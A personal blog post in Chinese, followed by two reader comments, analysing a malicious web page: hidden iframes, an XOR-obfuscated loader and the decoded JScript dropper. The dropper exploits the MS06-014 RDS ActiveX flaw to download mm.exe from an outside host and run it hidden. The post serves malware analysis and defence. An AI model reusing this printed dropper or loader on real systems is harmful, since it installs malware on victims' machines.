『原创』木马到底生在何处? – 记一次曲折的VBS网马查找之旅
弟弟元斌买了个新手机,昨天帮他下载MP4格式的电影。点进一个网页的时候,卡巴突然报了警,我便马上关闭了那个网页,后来也就没有理它,只记得vbs.downloader什么的。
今天本来想睡午觉了,不过突然想起了那个VBS网马,嗯,去看看是什么东西。打开卡巴,查看记录,找到了
“已检测到: 木马程序 Trojan-Downloader.VBS.Psyme.de URL: http://www.92mjj.cn/soft/tj.htm”
这一项。
如图:

到底是什么木马呢?我先把地址添加到迅雷里进行下载(用下载工具而不是直接用浏览器打开,页面里的脚本就不会被执行;更稳妥的做法是整个过程都在隔离的虚拟机里做),下载下来后用记事本打开查看源代码如下:
<script src='http://s127.cnzz.com/stat.php?id=573862&web_id=573862&online=1' language='JavaScript' charset='gb2312'></script> <iframe src="http://www.92mjj.cn/soft/1.htm" width="0" height="0" </iframe> <iframe src="http://www.92mjj.cn/soft/2.htm" width="0" height="0" </iframe> <iframe src="http://www.92mjj.cn/soft/3.htm" width="0" height="0" </iframe>
呵呵,又是这一招!第一行只是一段普通的“站长统计”脚本,打开后显示为“站长统计”四个字的超级链接,起掩护作用;网马就藏在下面三行 iframe 里,宽度高度都被设置为了 0,页面上根本看不见。我把
http://www.92mjj.cn/soft/1.htm、
http://www.92mjj.cn/soft/2.htm、
http://www.92mjj.cn/soft/3.htm
三个都放在迅雷中进行下载,结果第三个不能下载。
打开下载到的 1.htm,查看其源代码:
<script>
// Obfuscated payload. Each chunk is percent-encoded (JavaScript escape())
// XOR ciphertext. It is only usable after ALL chunks have been concatenated
// and unescaped once, because escape sequences are split across chunk
// boundaries (e.g. the "%1" ending the second chunk continues with "9" at the
// start of the third, and "%15i%" at the end of a later chunk continues with
// "1EJH"). The XOR key is STR.md5(pass), computed in performPage() below.
strHTML="";
strHTML+="%0C%5EVD%00E%5DF%17%5Ci8%0FZQKP%0B%00%14%10A%00Y%1F%0F%0F%1E%0C%05A%05";
strHTML+="%5DU%07%3Ai%0B%1BX%0C%11%07@ZCC%07%3ClYG%00A%0A%14A%11_P%0B%04F%05WU%1";
strHTML+="9%0AC%7DgU%11%0B%14F%0D%3E%3D_D%08%06@%0A%5C%0DDR_%1BC7%02t%21I%5Bl%06";
strHTML+="JLBW%11B+@%5B%01%0ANX%08%01%5B%14hA%29TE%5B%1388%11%16Q%5E%5DX%0E%15i%";
strHTML+="1EJH%16%60Rtr@Z3T%0F%11V%17%11G_%14O%11%0ECC%1B%17%17C%0EG%13K%17%10%1";
strHTML+="DIE%0E%3A3%3ClE%14C%13%07%08%15%0C%13%13%0D%17G%14%0A%1F%16@%14@%1A%0F";
strHTML+="Q%0F%0EX%1DPY%16B%09%03@L%5E%0EJPIV%13hi%08%12QB%19T%0B%5EXW%0E_%13%5B";
strHTML+="%5DWXNjD%01%5B%00F%0E%01%5BE%11l%3EAP%16UQMR%26%5BQ%5B%06%0C%10%10n%1B";
strHTML+="%15VS%0C%00W%17%11J_VYZ%5D%04%0EhFCUMv%17CF_%01%17%10W%11n%1F%1BR%0A%0";
strHTML+="4G%10Z%07F%19%13P%5D%16%0AW%5Ert%00%01%20%02%01%00NTQs%00%1E%06%08uVH%";
strHTML+="0D%5B%00%22I%05%01p%01Q%25pV%09u%0A%01A%1E%0F@%02%10DD%01%0ETQX%0A%04Y";
strHTML+="8%11%20%16PPGT*%01Y%01SD%1BjK%15y_%00%10%0BA%5CUC%17iDN%16.%11HFy%13%1";
strHTML+="8%13-A%18Fd%12%12%157%15%1F%143@H%10%11%1A%0COP%14EBP%0E%00%0C%5C%5DR%";
strHTML+="5C%3EAp%16UQMR%2CU%5ES%00%16Fo%1B%11v%5D%5E%02%07%1A0G%11%01T%5C%11%1D";
strHTML+="GA%1A_F%03b%15%17NDSA%3FY%03%08E%05b%13%09%15Q%0D%11%3EL%17vveGOEH%00%";
strHTML+="19%02AQl%16E%06%0C%00%10n%1B%1E%02f%0F%0BP%0CD%10YR_%1B%00US%03T%19%0B";
strHTML+="OV%11%17%5C%7E%05F6%04%0EP_P%5D%07%08oAp%11%01TEV%7E%07%09V%07D%12d%1F";
strHTML+="AdWD%0A%12%10%5B%5DT%19%7FX%0A%00g%1A@%17%01X%7EQ%5B%00%00GF%1C%12%1B%";
strHTML+="1EXAUDC4%03v%5DioqEQX%5C+UG6%03j%11v%00%17%60%14USPV%0Fq%5BZ%07%07%16%";
strHTML+="10n%1B%07%10%0A1%0CZ%07%5C%14%17%08Y%7BWA1%05%3F%12rL%5E%0FSdW%17%0AFo";
strHTML+="%1BeP%7D_%3C%3D%7C%17%04O3%5C_W%5E%12%10%1A_F%03b%15%2CGQXA%3FL%1B%08E";
strHTML+="%04b%131%17%5D%17VA9%1DG%01jG%11V%17@_WD%06u%5BR%1A@9%1B%08E%04b%135%0";
strHTML+="4B%06g%0C%22%5C%5DV%138Kd%0D%5ETV@%10%1B%06%1FX%14Wi%11p%5BVB%03GiK%1A";
strHTML+="X%12TC%13b%08%22P%15yG%7Ea%5B%0AW%5E%0A%0E%05_h%11tKT%07%11Q%2CQ%09%01";
strHTML+="VE%11lMA%60%0CU%5CU%19%22GDZ%0A%01%05FZ%5CY%1B%1DDG%1DXV%1B%14%04%0C%5";
strHTML+="By%03GaRk%12%7BB%0A%5BPf%02%16%0C%10n%1Ba%5Eu%08%3Fl+GTO%12moB%1C%10G%";
strHTML+="01%5D%03%0B%10O%10w%7B%27L%01JV%14%1E%02b%0B%24W%12z%14%23c%09h%136+V%";
strHTML+="08%5CuAr%00B%60SA%3FLWKC%06%15%16FJWC%14H3%5C_W%5E%12%10%1FF%12%1C%1BX";
strHTML+="%13RZ%14ORMOPRCZYN%0C%1D%18Z%5EUH%3C9%0DJ%10P%16Y@M%09n%3D%08E%00%10%0";
strHTML+="DBG%13C@A%03X%16%17V%1B%10%1A%7B%60R%17%0AC%10%12%0E_B%0DT@_%0C%0CD%5B";
strHTML+="%5DZC%11%18F%1E%14%07%5C%00%11XT%5DEK%14A%0DDU%11%15A%1E%0FK%14%0B%0AV";
strHTML+="%5CD%19V_%0A%0AU%07%13%5ED%5C_ZE%5E_%1C%17SBPG%17%099%3C_%00%0BVJ%13XW";
strHTML+="R%09%0B@%06K%17%09P_F%0CG%11V%10EBW%17%05VXE%06@D%5D%5D@RUT%05%11G%17R";
strHTML+="%11%10%08%13AT%11%16A%0A%10VX%5B%10R%16%16%0C%0C%00@RTDMP%14%11%09AA%0";
strHTML+="6%10@C%5D%11%03%02_%17U%12%07%3Ai%3A%3E";
function XOR(strV,strPass){
// Repeating-key XOR over UTF-16 code units: code unit i of strV is XORed
// with code unit (i mod strPass.length) of strPass. XOR is its own inverse,
// so the same call both encodes and decodes. Edge case kept as in the
// original: with an empty strPass the key index is NaN, charCodeAt(NaN)
// yields NaN, and x ^ NaN is x, so strV comes back unchanged.
var keyLen=strPass.length;
var out=[];
var pos=0;
while(pos<strV.length){
var keyUnit=strPass.charCodeAt(pos%keyLen);
out.push(String.fromCharCode(strV.charCodeAt(pos)^keyUnit));
pos++;
}
return out.join("");
}
// Hash helper used only to derive the XOR key. This appears to be an
// object-wrapped copy of the widely circulated public-domain JavaScript MD5
// library: the initial state (1732584193 = 0x67452301, ...), the per-step
// additive constants and the rotation amounts below are the standard
// RFC 1321 values, and chrsz = 8 means only the low byte of each code unit
// is hashed. Only STR.md5(s) -> hex_md5 -> str2binl / core_md5 / binl2hex is
// reached from performPage(), and that path is fully `this.`-qualified.
// Several other members (b64_hmac_md5, b64_md5, core_hmac_md5, md5_vm_test,
// str_hmac_md5, str_md5) call binl2b64 / core_md5 / str2binl / hex_md5
// WITHOUT `this.` and would throw ReferenceError if ever invoked -- dead
// code in this sample.
var STR =
{
hexcase : 0, /* hex output format. 0 - lowercase; 1 - uppercase */
b64pad : "", /* base-64 pad character. "=" for strict RFC compliance */
chrsz : 8, /* bits per input character. 8 - ASCII; 16 - Unicode */
// binl2b64 / core_hmac_md5 are unqualified here -- throws if called.
b64_hmac_md5:
function(key, data) { return binl2b64(core_hmac_md5(key, data)); },
// binl2b64 / core_md5 / str2binl are unqualified here -- throws if called.
b64_md5:
function(s){ return binl2b64(core_md5(str2binl(s), s.length * this.chrsz));},
// Little-endian 32-bit word array -> base64 text, padded with b64pad.
binl2b64:
function(binarray){
var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var str = "";
for(var i = 0; i < binarray.length * 4; i += 3)
{
var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
| (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
| ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
for(var j = 0; j < 4; j++)
{
if(i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
}
}
return str;
},
// Little-endian word array -> hex string, low byte of each word first;
// hexcase selects the alphabet (0 -> lowercase, used by this sample).
binl2hex:
function(binarray){
var hex_tab = this.hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
var str = "";
for(var i = 0; i < binarray.length * 4; i++)
{
str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
}
return str;
},
// Little-endian word array -> string of chrsz-bit characters.
binl2str:
function(bin){
var str = "";
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < bin.length * 32; i += this.chrsz)
str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
return str;
},
// 32-bit rotate left.
bit_rol:
function(num, cnt){return (num << cnt) | (num >>> (32 - cnt));},
// HMAC-MD5 (RFC 2104: ipad 0x36, opad 0x5C). str2binl / core_md5 are
// unqualified here, so this (and hex_hmac_md5, which calls it) would throw;
// unreachable in this sample.
core_hmac_md5:
function(key, data){
var bkey = str2binl(key);
if(bkey.length > 16) bkey = core_md5(bkey, key.length * this.chrsz);
var ipad = Array(16), opad = Array(16);
for(var i = 0; i < 16; i++)
{
ipad[i] = bkey[i] ^ 0x36363636;
opad[i] = bkey[i] ^ 0x5C5C5C5C;
}
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * this.chrsz);
return core_md5(opad.concat(hash), 512 + 128);
},
// MD5 over word array x holding `len` bits. Pads x in place (0x80
// terminator, then the bit length in word 14 of the last block -- only the
// low 32 bits of the length; the high word is never written and reads as 0
// in the bitwise arithmetic), runs 4 rounds x 16 steps per 512-bit block,
// and returns the final state [a, b, c, d].
core_md5:
function(x, len){
/* append padding */
x[len >> 5] |= 0x80 << ((len) % 32);
x[(((len + 64) >>> 9) << 4) + 14] = len;
var a = 1732584193;
var b = -271733879;
var c = -1732584194;
var d = 271733878;
for(var i = 0; i < x.length; i += 16)
{
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;
a = this.md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
d = this.md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
c = this.md5_ff(c, d, a, b, x[i+ 2], 17, 606105819);
b = this.md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
a = this.md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
d = this.md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426);
c = this.md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
b = this.md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
a = this.md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
d = this.md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
c = this.md5_ff(c, d, a, b, x[i+10], 17, -42063);
b = this.md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
a = this.md5_ff(a, b, c, d, x[i+12], 7 , 1804603682);
d = this.md5_ff(d, a, b, c, x[i+13], 12, -40341101);
c = this.md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
b = this.md5_ff(b, c, d, a, x[i+15], 22, 1236535329);
a = this.md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
d = this.md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
c = this.md5_gg(c, d, a, b, x[i+11], 14, 643717713);
b = this.md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
a = this.md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
d = this.md5_gg(d, a, b, c, x[i+10], 9 , 38016083);
c = this.md5_gg(c, d, a, b, x[i+15], 14, -660478335);
b = this.md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
a = this.md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438);
d = this.md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
c = this.md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
b = this.md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501);
a = this.md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
d = this.md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
c = this.md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473);
b = this.md5_gg(b, c, d, a, x[i+12], 20, -1926607734);
a = this.md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
d = this.md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
c = this.md5_hh(c, d, a, b, x[i+11], 16, 1839030562);
b = this.md5_hh(b, c, d, a, x[i+14], 23, -35309556);
a = this.md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
d = this.md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353);
c = this.md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
b = this.md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
a = this.md5_hh(a, b, c, d, x[i+13], 4 , 681279174);
d = this.md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
c = this.md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
b = this.md5_hh(b, c, d, a, x[i+ 6], 23, 76029189);
a = this.md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
d = this.md5_hh(d, a, b, c, x[i+12], 11, -421815835);
c = this.md5_hh(c, d, a, b, x[i+15], 16, 530742520);
b = this.md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);
a = this.md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
d = this.md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415);
c = this.md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
b = this.md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
a = this.md5_ii(a, b, c, d, x[i+12], 6 , 1700485571);
d = this.md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
c = this.md5_ii(c, d, a, b, x[i+10], 15, -1051523);
b = this.md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
a = this.md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
d = this.md5_ii(d, a, b, c, x[i+15], 10, -30611744);
c = this.md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
b = this.md5_ii(b, c, d, a, x[i+13], 21, 1309151649);
a = this.md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
d = this.md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
c = this.md5_ii(c, d, a, b, x[i+ 2], 15, 718787259);
b = this.md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);
a = this.safe_add(a, olda);
b = this.safe_add(b, oldb);
c = this.safe_add(c, oldc);
d = this.safe_add(d, oldd);
}
return Array(a, b, c, d);
},
// hex_hmac_md5 reaches the broken core_hmac_md5 above. hex_md5 / md5 are the
// path performPage() uses: STR.md5(s) is the lowercase hex MD5 of the low
// byte of each code unit of s (32 characters).
hex_hmac_md5:function(key, data){ return this.binl2hex(this.core_hmac_md5(key, data)); },
hex_md5:function(s){return this.binl2hex(this.core_md5(this.str2binl(s), s.length * this.chrsz));},
md5:function(s){return(this.hex_md5(s));},
// One MD5 step: b + rol(a + f(b,c,d) + x + t, s). ff/gg/hh/ii supply the
// round functions F, G, H, I of RFC 1321 section 3.4.
md5_cmn:function(q, a, b, x, s, t){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a, q), this.safe_add(x, t)), s),b);},
md5_ff:function(a, b, c, d, x, s, t){return this.md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);},
md5_gg:function(a, b, c, d, x, s, t){return this.md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);},
md5_hh:function(a, b, c, d, x, s, t){return this.md5_cmn(b ^ c ^ d, a, b, x, s, t);},
md5_ii:function(a, b, c, d, x, s, t){return this.md5_cmn(c ^ (b | (~d)), a, b, x, s, t);},
// Self-test; hex_md5 is unqualified, so this throws rather than returning a boolean.
md5_vm_test:function(){return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";},
// 32-bit wrap-around addition done in 16-bit halves so intermediate values
// never lose precision in JS doubles.
safe_add:
function(x, y){
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
},
// String -> little-endian word array, chrsz bits per character (8 here:
// mask 0xFF keeps only the low byte of each UTF-16 code unit).
str2binl:
function(str){
var bin = Array();
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < str.length * this.chrsz; i += this.chrsz)
bin[i>>5] |= (str.charCodeAt(i / this.chrsz) & mask) << (i%32);
return bin;
},
// Unqualified binl2str / core_hmac_md5 / core_md5 / str2binl -- dead code.
str_hmac_md5:function(key, data){ return binl2str(core_hmac_md5(key, data)); },
str_md5:function(s){ return binl2str(core_md5(str2binl(s), s.length * this.chrsz));}
}
// Decode the hidden payload and execute it in the page.
// strPass: optional key supplied by a caller. The page invokes performPage()
//   with no argument (see below), so this branch is never taken here; it
//   would store the supplied password in a cookie and decode with it.
// Otherwise the embedded, percent-encoded password is used. In both paths the
// XOR key is STR.md5(pass) -- the 32-character lowercase hex digest -- cycled
// over the unescaped ciphertext, and the resulting HTML/script is passed to
// document.write(), i.e. parsed and run by the browser. Returns false.
function performPage(strPass){
if(strPass){
// The cookie is written but never read anywhere in this file; its purpose is
// not evident from the sample.
document.cookie="password="+escape(strPass);
document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
// Embedded key, escape()-encoded. Decodes to "MU JJ A  MU  AIIIAIFHHH" --
// note the two double spaces (%20%20); every character feeds the MD5 key.
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH";
if(pass){
pass=unescape(pass);
document.write(XOR(unescape(strHTML),STR.md5(pass)));
return(false);
}
}
// Runs at parse time with no argument -> always the embedded-key branch.
performPage();
</script>
我以为真正的木马地址会直接显现出来。可正如上所看到的,网马被加了密——准确地说是先做 XOR 混淆、再用 escape() 做百分号编码,密钥由一个密码的 MD5 值派生,真正的木马代码在文件里根本不以明文出现。用卡巴试着查杀,卡巴没有检测到危险,这也不奇怪:基于特征码的静态扫描,对这种要到运行时才解码的网马效果有限。密密麻麻这么多的代码,还真得花些时间分析一下。不过学技术嘛,我可不能偷懒~~
strHTML后面的是被混淆后的代码字符串,外层用的是 JavaScript 的 escape()(只是百分号编码,并不是微软的什么加密算法,unescape() 就能还原),里面才是 XOR 过的密文;function XOR(strV,strPass) 这个过程就是解密函数,用 strPass 逐字符循环异或,而这里传给它的 strPass 并不是密码本身,而是密码经 STR.md5() 算出的 32 位十六进制串(后面那一大段 STR 对象就是一个 MD5 实现,只为算这个密钥)。主要来看最后一个过程调用,这个过程要仔细分析了,我加了自己的注释:
function performPage(strPass){
if(strPass){ // If a password was passed in, use it (never the case on this page -- see the call at the bottom).
document.cookie="password="+escape(strPass); // Stores the escape()-encoded password in a cookie. Nothing in this file reads it back; the "already executed" marker interpretation is a guess the code does not confirm.
document.write(XOR(unescape(strHTML),STR.md5(strPass))); // Decodes strHTML with MD5(password) as the XOR key and executes the result in the page.
return(false);
}
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH"; // The embedded password, escape()-encoded (percent-encoding, not encryption).
if(pass){
pass=unescape(pass); // Undo the percent-encoding to get the plaintext password.
document.write(XOR(unescape(strHTML),STR.md5(pass))); // Same as above: XOR-decode strHTML with MD5(password) and execute it.
return(false);
}
}
performPage(); // Entry point: called with no argument, so the embedded password is used.
我们先来看看密码是什么,用在线的 URL 解码(unescape)工具解一下就可以了。“MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH”解码后就是“MU JJ A  MU  AIIIAIFHHH”——注意其中 %20%20 对应两个连续空格,一个都不能丢,因为真正的 XOR 密钥是这个字符串的 MD5 值,差一个字符密钥就完全不同。也可以不用工具,让脚本自己解出来。我们把performPage(strPass)这个过程改动一下,让它直接输出密码明文来。将它改成:
// Variant 1 of the decoder: reveal the password instead of running the payload.
// Note that this still executes the (modified) script in a browser; do it in an
// isolated VM, or decode offline outside a browser.
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass))); // Disabled: this line would execute the decoded payload.
document.write(pass); // Prints the decoded password as page text. Rendered HTML collapses runs of spaces, so the two double spaces may not be visible here -- check view-source or use a textarea.
return(false);
}
}
performPage();
最后就要来查看它的木马代码了。用上述方法让它把木马代码直接用明文显示出来——关键是把 document.write() 换成写入 textarea 的 value,这样解出来的 HTML/脚本只是被当作文本显示,而不会被浏览器解析执行(当然,解码脚本本身仍然在浏览器里运行,这一步最好在虚拟机里做,或者干脆用脱离浏览器的脚本环境离线解码)。修改成:
// Variant 2: write the decoded payload into a <textarea> (as .value) so it is
// displayed as text rather than executed. Requires an element with id="muma"
// to exist before performPage() runs, which is why the call is moved into a
// second <script> placed after the textarea.
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
//document.write(pass);
// Assigning to .value never parses the string as HTML, so the payload is shown, not run.
document.getElementById( "muma" ).value = XOR(unescape(strHTML),STR.md5(pass));
return(false);
}
}
//performPage();
</script>
<textarea id="muma" name="muma" rows="10" cols="50"></textarea>
<script language=javascript>performPage();
将它保存为11.htm后打开,就可以在 textarea 里看到解码后的木马源代码了(注意 performPage() 的调用要放到 textarea 之后的第二段 <script> 里,否则 getElementById("muma") 取不到元素)。如图:

看到了吗?http://www.92mjj.cn/soft/mm.exe,这就是木马的地址!!解出来的代码通过 classid 为 BD96C556-65A3-11D0-983A-00C04FC29E36 的 ActiveX 对象(即 MDAC 的 RDS.DataSpace 控件,MS06-014 修补的那个漏洞)调用 CreateObject 创建 Microsoft.XMLHTTP 同步下载这个 exe,用 Adodb.Stream 以二进制方式写到 Windows 目录下的 ~tmp.tmp(文件名是固定的,代码里的 Math.random() 结果根本没用上),再通过 Shell.Application 调用 CMD.exe /c 隐藏窗口运行,整个过程包在 try/catch 里、出错就静默放弃。这套流程只在未打补丁的 IE 上有效,其他浏览器没有这些 ActiveX 对象,不会执行。
我把解出来的源代码复制过来(注意最后的 <body> 标签上禁用了右键菜单、选中和拖拽,这是妨碍查看页面源代码的小手段):
<noscript>
<iframe src=*></iframe>
</noscript>
<script language = JScript>
// Decoded dropper. Runs only in Internet Explorer via ActiveX (other browsers
// have no CreateObject). Walk-through of the minified lines below:
//  - gn(): calls Math.random() but discards the result and always returns the
//    constant '~tmp.tmp' -- the drop file name is fixed, not random.
//  - v = dl = "<url>/mm.exe": both implicit globals hold the download URL.
//  - createElement("object") with classid BD96C556-65A3-11D0-983A-00C04FC29E36
//    (widely documented as the MDAC RDS.DataSpace control, MS06-014); its
//    CreateObject() lets page script instantiate arbitrary COM objects.
//  - Microsoft.XMLHTTP: open("GET", v, 0) -> synchronous download of the exe.
//  - Scripting.FileSystemObject: GetSpecialFolder(0) is the Windows folder;
//    BuildPath gives %WINDIR%\~tmp.tmp.
//  - Adodb.Stream with type 1 (binary): Write(responseBody), then
//    SaveToFile(path, 2) overwrites any existing file of that name.
//  - Shell.Application.ShellExecute(%WINDIR%\system32\CMD.exe,
//    ' /c <dropped file>', "", "open", 0): runs the file via cmd with a
//    hidden window (show flag 0).
//  - Everything is inside try{...}catch(i){i=1}, so any failure (patched IE,
//    blocked ActiveX, download error) is swallowed silently. Identifiers are
//    randomized; "Windows" is an implicit global reused as the file path.
function gn(rRaGEykU1){var orh2=window["Math"]["random"]()*rRaGEykU1;return'~tmp'+'.tmp'}try{v=
dl = "http://www.92mjj.cn/soft/mm.exe"
;var chilam=window["document"]["createElement"]("object");chilam["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var v2=chilam["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var v3=chilam["CreateObject"]("Adodb.Stream","");v3["type"]=1;v2["open"]("GET",v,0);v2["send"]();Windows=gn(10000);var hHf$R6=chilam["CreateObject"]("Scripting.FileSystemObject","");var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0);Windows=hHf$R6["BuildPath"](VgDnZXHt7,Windows);v3["Open"]();v3["Write"](v2["responseBody"]);v3["SaveToFile"](Windows,2);v3["Close"]();var SmAcqIwGV8=chilam["CreateObject"]("Shell.Application","");exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','CMD.exe');SmAcqIwGV8["SHellExEcuTe"](exp1,' /c '+Windows,"","open",0)}catch(i){i=1}
</script>
<script type="text/JScript">/* Runs after the load event and calls document.write(""). A write issued after the document has finished loading implicitly re-opens it and replaces the content, so in effect this blanks the frame once the loader above has already executed (the intent is not stated in the sample). */function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
到这里还没有结束呢,我们把木马下载下来研究一下吧~(样本只能在断网或网络隔离的虚拟机里下载和运行,千万不要在日常使用的机器上操作。)

先用卡巴杀一下,卡巴不杀。打开我的虚拟机,把木马样本拖进去。打开Regsnap来进行快照对照。Regsnap大家都知道的吧,一款有名的注册表监视工具,具体用法就不再赘述了。结果双击木马文件时运行出错了。晕哦,木马作者怎么在搞的呀?凭我的第一感觉应该是做免杀时出差错了。不过我还是看了下监视的结果——弹出报错并不等于什么都没发生,对照快照可以看到它修改了很多处注册表项,最明显的是把windows附件里游戏啊、远程桌面连接什么的给删除了(Regsnap 只能看到注册表差异,文件释放、进程和网络连接等行为还得配合其他监控工具才能看全),郁闷中~~
好了,网马的真正地址终于查找出来了(卡巴报的名字是 VBS.Psyme,不过解出来的其实是一段 JScript,它下载并执行的就是 mm.exe)。最大的收获就是要学会耐心、仔细地分析问题,希望此次查找网马之旅能对大家有所帮助。
你好厉害喔。向你学习了。订阅你的博客才行。哈。
呵呵,没有了,我也一直都在学习,希望能和你们多多交流。